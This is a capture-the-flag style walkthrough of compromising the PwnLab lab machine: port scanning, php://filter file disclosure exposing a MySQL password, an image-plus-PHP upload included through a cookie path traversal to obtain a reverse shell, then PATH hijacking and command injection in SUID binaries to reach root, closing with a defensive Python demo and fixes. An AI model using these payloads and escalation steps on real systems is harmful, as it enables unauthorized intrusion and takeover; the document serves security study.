Disclaimer
The host attacked in this write-up was legally authorized for testing. The tools and methods used here are for study and discussion only; do not use the tools or the approach described for any illegal purpose. I accept no responsibility for any consequences, misuse or damage that results.
Service enumeration
┌──(root💀kali)-[~/pg/PwnLab]
└─# nmap -p- 192.168.151.29 --open
Starting Nmap 7.91 (https://nmap.org) at 2022-01-17 07:50 EST
Nmap scan report for 192.168.151.29
Host is up (0.22s latency).
Not shown: 65257 closed ports, 274 filtered ports
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT STATE SERVICE
80/tcp open http
111/tcp open rpcbind
3306/tcp open mysql
53955/tcp open unknown
Nmap done: 1 IP address (1 host up) scanned in 94.55 seconds
┌──(root💀kali)-[~/pg/PwnLab]
└─# nmap -sV -T5 -A -O 192.168.151.29 -p 80,111,3306,53955
Starting Nmap 7.91 (https://nmap.org) at 2022-01-17 07:52 EST
Nmap scan report for 192.168.151.29
Host is up (0.23s latency).
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.10 ((Debian))
|_http-server-header: Apache/2.4.10 (Debian)
|_http-title: PwnLab Intranet Image Hosting
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 3,4 111/tcp6 rpcbind
| 100000 3,4 111/udp6 rpcbind
| 100024 1 35282/udp status
| 100024 1 43712/tcp6 status
| 100024 1 47161/udp6 status
|_ 100024 1 53955/tcp status
3306/tcp open mysql MySQL 5.5.47-0+deb8u1
| mysql-info:
| Protocol: 10
| Version: 5.5.47-0+deb8u1
| Thread ID: 38
| Capabilities flags: 63487
| Some Capabilities: DontAllowDatabaseTableColumn, ODBCClient, Speaks41ProtocolNew, LongPassword, FoundRows, SupportsTransactions, InteractiveClient, Speaks41ProtocolOld, IgnoreSigpipes, LongColumnFlag, Support41Auth, IgnoreSpaceBeforeParenthesis, SupportsCompression, SupportsLoadDataLocal, ConnectWithDatabase, SupportsMultipleStatments, SupportsAuthPlugins, SupportsMultipleResults
| Status: Autocommit
| Salt: mT<l1J`%6|5-#fZn=&BZ
|_ Auth Plugin Name: mysql_native_password
53955/tcp open status 1 (RPC #100024)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.10 - 3.12 (94%), Linux 4.4 (94%), Linux 4.9 (94%), Linux 3.10 (91%), Linux 3.10 - 4.11 (90%), Linux 3.11 - 4.1 (90%), Linux 3.2 - 4.9 (90%), Linux 2.6.32 (90%), Linux 2.6.32 or 3.10 (90%), Linux 2.6.39 (90%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
TRACEROUTE (using port 443/tcp)
HOP RTT ADDRESS
1 227.38 ms 192.168.49.1
2 227.59 ms 192.168.151.29
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 39.73 seconds
web
┌──(root💀kali)-[~/pg/PwnLab]
└─# python3 /root/dirsearch/dirsearch.py -e* -u http://192.168.151.29 -t 30
_|. _ _ _ _ _ _|_ v0.4.2
(_||| _) (/_(_|| (_|)
Extensions: php, jsp, asp, aspx, do, action, cgi, pl, html, htm, js, json, tar.gz, bak | HTTP method: GET | Threads: 30 | Wordlist size: 15492
Output File: /root/dirsearch/reports/192.168.151.29/_22-01-17_07-55-55.txt
Error Log: /root/dirsearch/logs/errors-22-01-17_07-55-55.log
Target: http://192.168.151.29/
[07:55:55] Starting:
[07:57:33] 200 - 0B - /config.php
[07:57:59] 200 - 943B - /images/
[07:57:59] 301 - 317B - /images -> http://192.168.151.29/images/
[07:58:02] 200 - 332B - /index.php/login/
[07:58:02] 200 - 332B - /index.php
[07:58:09] 200 - 250B - /login.php
[07:58:59] 301 - 317B - /upload -> http://192.168.151.29/upload/
[07:59:00] 200 - 19B - /upload.php
[07:59:00] 200 - 743B - /upload/
This turns up four PHP files (config.php, index.php, upload.php, login.php)
and two directories (images and upload).
rpc
┌──(root💀kali)-[~/pg/PwnLab]
└─# rpcinfo 192.168.151.29
program version netid address service owner
100000 4 tcp6 ::.0.111 portmapper superuser
100000 3 tcp6 ::.0.111 portmapper superuser
100000 4 udp6 ::.0.111 portmapper superuser
100000 3 udp6 ::.0.111 portmapper superuser
100000 4 tcp 0.0.0.0.0.111 portmapper superuser
100000 3 tcp 0.0.0.0.0.111 portmapper superuser
100000 2 tcp 0.0.0.0.0.111 portmapper superuser
100000 4 udp 0.0.0.0.0.111 portmapper superuser
100000 3 udp 0.0.0.0.0.111 portmapper superuser
100000 2 udp 0.0.0.0.0.111 portmapper superuser
100000 4 local /run/rpcbind.sock portmapper superuser
100000 3 local /run/rpcbind.sock portmapper superuser
100024 1 udp 0.0.0.0.137.210 status 106
100024 1 tcp 0.0.0.0.210.195 status 106
100024 1 udp6 ::.184.57 status 106
100024 1 tcp6 ::.170.192 status 106
┌──(root💀kali)-[~/pg/PwnLab]
└─# nmap -sSUC -p 111 192.168.151.29
Starting Nmap 7.91 (https://nmap.org) at 2022-01-17 08:05 EST
Nmap scan report for 192.168.151.29
Host is up (0.33s latency).
PORT STATE SERVICE
111/tcp open rpcbind
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 3,4 111/tcp6 rpcbind
| 100000 3,4 111/udp6 rpcbind
| 100024 1 35282/udp status
| 100024 1 43712/tcp6 status
| 100024 1 47161/udp6 status
|_ 100024 1 53955/tcp status
111/udp open|filtered rpcbind
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 3,4 111/tcp6 rpcbind
| 100000 3,4 111/udp6 rpcbind
| 100024 1 35282/udp status
| 100024 1 43712/tcp6 status
| 100024 1 47161/udp6 status
|_ 100024 1 53955/tcp status
Nmap done: 1 IP address (1 host up) scanned in 26.38 seconds
Only rpcbind and rpc.statd (NFS lock status) are registered, and no NFS export is advertised, so there is nothing especially useful here.
LFI
The home page URL has the form:
http://192.168.151.29/?page=
So far page takes only two values, login and upload; the value is include()d with ".php" appended, as index.php's source confirms below.
That unfiltered include() is a local file inclusion, and PHP's php://filter stream wrapper turns it into source disclosure: convert.base64-encode encodes the file before include() sees it, so the PHP comes back as text instead of being executed.
The following payload reads the login.php source:
http://192.168.151.29/?page=php://filter/convert.base64-encode/resource=login
The page prints the source as a base64 blob; decoding it gives:
<?php
session_start();
require("config.php");
$mysqli = new mysqli($server, $username, $password, $database);
if (isset($_POST['user']) and isset($_POST['pass']))
{
    $luser = $_POST['user'];
    $lpass = base64_encode($_POST['pass']);
    $stmt = $mysqli->prepare("SELECT * FROM users WHERE user=? AND pass=?");
    $stmt->bind_param('ss', $luser, $lpass);
    $stmt->execute();
    $stmt->store_Result();
    if ($stmt->num_rows == 1)
    {
        $_SESSION['user'] = $luser;
        header('Location: ?page=upload');
    }
    else
    {
        echo "Login failed.";
    }
}
else
{
?>
<form action="" method="POST">
<label>Username: </label><input id="user" type="test" name="user"><br />
<label>Password: </label><input id="pass" type="password" name="pass"><br />
<input type="submit" name="submit" value="Login">
</form>
<?php
}
The same payload with resource=upload reads the upload.php source:
http://192.168.151.29/?page=php://filter/convert.base64-encode/resource=upload
<?php
session_start();
if (!isset($_SESSION['user'])) { die('You must be log in.'); }
?>
<html>
<body>
<form action='' method='post' enctype='multipart/form-data'>
<input type='file' name='file' id='file' />
<input type='submit' name='submit' value='Upload'/>
</form>
</body>
</html>
<?php
if(isset($_POST['submit'])) {
    if ($_FILES['file']['error'] <= 0) {
        $filename = $_FILES['file']['name'];
        $filetype = $_FILES['file']['type'];
        $uploaddir = 'upload/';
        $file_ext = strrchr($filename, '.');
        $imageinfo = getimagesize($_FILES['file']['tmp_name']);
        $whitelist = array(".jpg",".jpeg",".gif",".png");
        if (!(in_array($file_ext, $whitelist))) {
            die('Not allowed extension, please upload images only.');
        }
        if(strpos($filetype,'image') === false) {
            die('Error 001');
        }
        if($imageinfo['mime'] != 'image/gif' && $imageinfo['mime'] != 'image/jpeg' && $imageinfo['mime'] != 'image/jpg' && $imageinfo['mime'] != 'image/png') {
            die('Error 002');
        }
        if(substr_count($filetype, '/')>1){
            die('Error 003');
        }
        $uploadfile = $uploaddir . md5(basename($_FILES['file']['name'])).$file_ext;
        if (move_uploaded_file($_FILES['file']['tmp_name'], $uploadfile)) {
            echo "<img src=\"".$uploadfile."\"><br />";
        } else {
            die('Error 4');
        }
    }
}
?>
And with resource=config the config.php source:
http://192.168.151.29/?page=php://filter/convert.base64-encode/resource=config
<?php
$server = "localhost";
$username = "root";
$password = "H4u%QJ_H99";
$database = "Users";
?>
That gives us the MySQL root password, stored in plain text in a web-readable file. Because the target exposes MySQL on 3306 (see the port scan), we can connect to it directly from the attacking machine.
mysql
Switching to the database fails with access denied:
MySQL [(none)]> show databases;
+--------------------+
| Database |
+--------------------+
| information_schema |
| Users |
+--------------------+
2 rows in set (0.243 sec)
MySQL [(none)]> use users;
ERROR 1044 (42000): Access denied for user 'root'@'%' to database 'users'
The denial is not a missing grant. MySQL database names are case-sensitive on Linux hosts (lower_case_table_names=0 by default), the error refers to 'users' and the grant is on `Users`, so `USE Users;` would have worked. The grants confirm SELECT on everything in Users:
MySQL [information_schema]> show grants;
+------------------------------------------------------------------+
| Grants for root@% |
+------------------------------------------------------------------+
| GRANT USAGE ON *.* TO 'root'@'%' IDENTIFIED BY PASSWORD <secret> |
| GRANT SELECT ON `Users`.* TO 'root'@'%' |
+------------------------------------------------------------------+
2 rows in set (0.228 sec)
List the tables through information_schema, then dump the data (using the correct case):
MySQL [information_schema]> select * from tables where table_schema = 'Users';
+---------------+--------------+------------+------------+--------+---------+------------+------------+----------------+-------------+-----------------+--------------+-----------+----------------+---------------------+-------------+------------+-------------------+----------+----------------+---------------+
| TABLE_CATALOG | TABLE_SCHEMA | TABLE_NAME | TABLE_TYPE | ENGINE | VERSION | ROW_FORMAT | TABLE_ROWS | AVG_ROW_LENGTH | DATA_LENGTH | MAX_DATA_LENGTH | INDEX_LENGTH | DATA_FREE | AUTO_INCREMENT | CREATE_TIME | UPDATE_TIME | CHECK_TIME | TABLE_COLLATION | CHECKSUM | CREATE_OPTIONS | TABLE_COMMENT |
+---------------+--------------+------------+------------+--------+---------+------------+------------+----------------+-------------+-----------------+--------------+-----------+----------------+---------------------+-------------+------------+-------------------+----------+----------------+---------------+
| def | Users | users | BASE TABLE | InnoDB | 10 | Compact | 3 | 5461 | 16384 | 0 | 0 | 10485760 | NULL | 2016-03-17 10:17:53 | NULL | NULL | latin1_swedish_ci | NULL | | |
+---------------+--------------+------------+------------+--------+---------+------------+------------+----------------+-------------+-----------------+--------------+-----------+----------------+---------------------+-------------+------------+-------------------+----------+----------------+---------------+
1 row in set (1.383 sec)
MySQL [information_schema]> select * from Users.users;
+------+------------------+
| user | pass |
+------+------------------+
| kent | Sld6WHVCSkpOeQ== |
| mike | U0lmZHNURW42SQ== |
| kane | aVN2NVltMkdSbw== |
+------+------------------+
3 rows in set (0.251 sec)
login.php stores base64_encode($_POST['pass']) rather than a hash, so the pass column decodes straight back to plaintext. Three sets of credentials:
kent:JWzXuBJJNy
mike:SIfdsTEn6I
kane:iSv5Ym2GRo
Logging in with these gets to the upload page, but all the upload bypasses I tried failed...
Reading index.php the same way:
<?php
//Multilingual. Not implemented yet.
//setcookie("lang","en.lang.php");
if (isset($_COOKIE['lang']))
{
    include("lang/".$_COOKIE['lang']);
}
// Not implemented yet.
?>
<html>
<head>
<title>PwnLab Intranet Image Hosting</title>
</head>
<body>
<center>
<img src="images/pwnlab.png"><br />
[<a href="/">Home</a>] [<a href="?page=login">Login</a>] [<a href="?page=upload">Upload</a>]
<hr/><br/>
<?php
if (isset($_GET['page']))
{
    include($_GET['page'].".php");
}
else
{
    echo "Use this server to upload and share image files inside the intranet";
}
?>
</center>
</body>
</html>
Note this line: the file that gets included comes straight from a cookie the client controls, with no filtering and no extension check:
include("lang/".$_COOKIE['lang']);
include() parses whatever it reads as PHP source regardless of the file name, so if the cookie points at an uploaded image that carries PHP code, that code runs. This is file inclusion, not a parsing bug in the web server.
Upload an image first, intercept the request with Burp Suite and append the contents of rever_shell.php to the image data; the image header keeps upload.php's checks happy and the server stores the file as ae3c0cf901daed40d3382c6c67c15a63.jpg.
Start a listener, then use curl to set the cookie, with one ../ to walk from lang/ into upload/, and trigger the inclusion:
┌──(root💀kali)-[~/pg/PwnLab]
└─# curl -v --cookie "lang=../upload/ae3c0cf901daed40d3382c6c67c15a63.jpg" http://192.168.151.29/index.php
* Trying 192.168.151.29:80...
* Connected to 192.168.151.29 (192.168.151.29) port 80 (#0)
> GET /index.php HTTP/1.1
> Host: 192.168.151.29
> User-Agent: curl/7.74.0
> Accept: */*
> Cookie: lang=../upload/ae3c0cf901daed40d3382c6c67c15a63.jpg
>
The listener receives the reverse shell:
└─# nc -lnvp 4242
listening on [any] 4242 ...
connect to [192.168.49.151] from (UNKNOWN) [192.168.151.29] 38751
Linux pwnlab 3.16.0-4-686-pae #1 SMP Debian 3.16.7-ckt20-1+deb8u4 (2016-02-29) i686 GNU/Linux
11:03:44 up 3:17, 0 users, load average: 0.00, 0.01, 0.05
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ whoami
www-data
Privilege escalation
The credentials obtained above:
kent:JWzXuBJJNy
mike:SIfdsTEn6I
kane:iSv5Ym2GRo
kent and kane both accept their password for su, so we can switch between those two freely.
local.txt is in kane's home directory.
kane's home also contains a SUID binary, msgmike,
owned by mike.
Inspect it with strings:
kane@pwnlab:~$ strings msgmike
strings msgmike
/lib/ld-linux.so.2
libc.so.6
_IO_stdin_used
setregid
setreuid
system
__libc_start_main
__gmon_start__
GLIBC_2.0
PTRh
QVh[[^_]
cat /home/mike/msg.txt
It runs the command cat /home/mike/msg.txt through system(). cat is a bare command name, so /bin/sh resolves it through our PATH, and we can hijack it.
Put /home/kane at the front of $PATH:
export PATH=/home/kane:$PATH
Create a file named cat and make it executable:
touch /home/kane/cat
chmod +x /home/kane/cat
Write the following into /home/kane/cat:
#!/bin/bash
bash -p
Run msgmike; after its setreuid() to mike it calls our cat, which drops into a shell as mike:
kane@pwnlab:~$ ./msgmike
./msgmike
mike@pwnlab:~$whoami
whoami
mike
mike's home directory has msg2root, also SUID, this time owned by root. strings again:
mike@pwnlab:/home/mike$ strings msg2root
strings msg2root
/lib/ld-linux.so.2
libc.so.6
_IO_stdin_used
stdin
fgets
asprintf
system
__libc_start_main
__gmon_start__
GLIBC_2.0
PTRh
[^_]
Message for root:
/bin/echo %s >> /root/messages.txt
It runs /bin/echo %s >> /root/messages.txt through system(), where %s is the line we type (read with fgets and spliced in with asprintf) without any sanitization, so shell metacharacters in the message are interpreted. The command is fixed this time, so PATH hijacking does not apply; instead we inject a second command: id & bash -p backgrounds the echo and starts a bash that keeps root's effective uid.
Message for root: id & bash -p
id & bash -p
bash-4.3# id
bash-4.3# whoami
whoami
root
Grab proof.txt:
bash-4.3# more proof.txt
more proof.txt
8ae5471d5970a5...
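Both SUID binaries fail the same way: they hand a string to system(), so /bin/sh resolves bare command names through the caller's PATH (msgmike) and interprets metacharacters in user input (msg2root). The following Python is an added demonstration, not code from the write-up or from the VM: it reproduces both command shapes inside a temporary directory with no setuid bit involved, using subprocess as a stand-in for C's system(), and puts the hardened alternative (read or append the file directly, never through a shell) beside each one. The file names, the HIJACKED marker and the injected touch command are ours.

```python
import os
import subprocess
import tempfile


def system_like(cmd, env):
    """Stand-in for C's system(): /bin/sh -c with an explicit environment,
    so the PATH under test is exactly what the child sees."""
    return subprocess.run(["/bin/sh", "-c", cmd], env=env, capture_output=True, text=True)


# --- msgmike: setreuid(mike, mike); system("cat /home/mike/msg.txt") ---

def path_hijack_demo():
    """Returns (what the shell-based read printed, what a direct read returns).
    A bare 'cat' in system() is resolved through PATH, so a directory we control
    placed first in PATH wins; reading the file ourselves never consults PATH."""
    with tempfile.TemporaryDirectory() as d:
        msg = os.path.join(d, "msg.txt")
        with open(msg, "w") as f:
            f.write("real message\n")
        fake_cat = os.path.join(d, "cat")                 # attacker-controlled 'cat'
        with open(fake_cat, "w") as f:
            f.write("#!/bin/sh\necho HIJACKED\n")         # the write-up's version ran: bash -p
        os.chmod(fake_cat, 0o755)
        env = {"PATH": d + ":/usr/bin:/bin"}               # export PATH=/home/kane:$PATH
        hijacked = system_like(f"cat {msg}", env).stdout.strip()
        with open(msg) as f:                               # hardened form: no shell, no lookup
            direct = f.read()
        return hijacked, direct


# --- msg2root: asprintf(&cmd, "/bin/echo %s >> /root/messages.txt", msg); system(cmd) ---

def msg2root_command(msg):
    """The exact string msg2root hands to system(): user input spliced into shell syntax."""
    return "/bin/echo %s >> /root/messages.txt" % msg


def injection_demo():
    """Runs the vulnerable command shape against a temp log with a message that smuggles
    extra commands. Returns (log contents, whether the injected command ran).
    The >> redirection only attaches to the last command, so 'hello' never reaches the log."""
    with tempfile.TemporaryDirectory() as d:
        log = os.path.join(d, "messages.txt")
        marker = os.path.join(d, "pwned")
        msg = f"hello; touch {marker}; echo injected"      # the write-up typed: id & bash -p
        system_like("/bin/echo %s >> %s" % (msg, log), {"PATH": "/usr/bin:/bin"})
        with open(log) as f:
            return f.read(), os.path.exists(marker)


def safe_demo():
    """Hardened form: append the message with a file write, never through a shell.
    The same hostile message lands in the log as literal text and nothing executes."""
    with tempfile.TemporaryDirectory() as d:
        log = os.path.join(d, "messages.txt")
        marker = os.path.join(d, "pwned")
        msg = f"hello; touch {marker}; echo injected"
        with open(log, "a") as f:
            f.write(msg + "\n")
        with open(log) as f:
            return f.read(), os.path.exists(marker)


if __name__ == "__main__":
    print("PATH hijack:", path_hijack_demo())
    print("vulnerable shape:", injection_demo())
    print("hardened shape:", safe_demo())
```

The fix for both binaries is the same: open the file with the C library (fopen and friends) instead of spawning a shell, or, if a child process is unavoidable, execve() an absolute path with an argv array and a sanitized environment so neither PATH nor the message content is interpreted by /bin/sh.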
Summary
Why the upload turned into code execution:
The Apache version is 2.4.10, and this post originally attributed the exploit to the Apache HTTPD multi-suffix parsing issue reported for 2.4.0 to 2.4.29 (the idea that a name such as test.php.jpg is handled as PHP because a .php suffix appears in it). That is not what happens on this box: the uploaded file is never served through Apache's PHP handler at all, so the httpd version is irrelevant here.
Look at this line in upload.php:
$uploadfile = $uploaddir . md5(basename($_FILES['file']['name'])).$file_ext;
The stored name is the md5 of the original file name plus an extension from the whitelist, the client-supplied Content-Type must contain "image", and getimagesize() must recognise the body as a GIF, JPEG or PNG. So there is no way to get a .php file into upload/; what we can do is upload a real image with PHP code appended, because none of the checks look past the image header.
The second half is this line in index.php:
include("lang/".$_COOKIE['lang']);
The lang value is ours to set (curl's --cookie) and is neither filtered nor confined to lang/, so ../upload/<md5>.jpg walks into the upload directory. PHP's include() parses the target as PHP source whatever its extension: the image bytes are echoed as output and every <?php ... ?> block is executed. The chain is therefore an image upload plus a local file inclusion, and it would work identically on any Apache or PHP version.
The same thing in two lines:
<?php
include('evil.jpg');
?>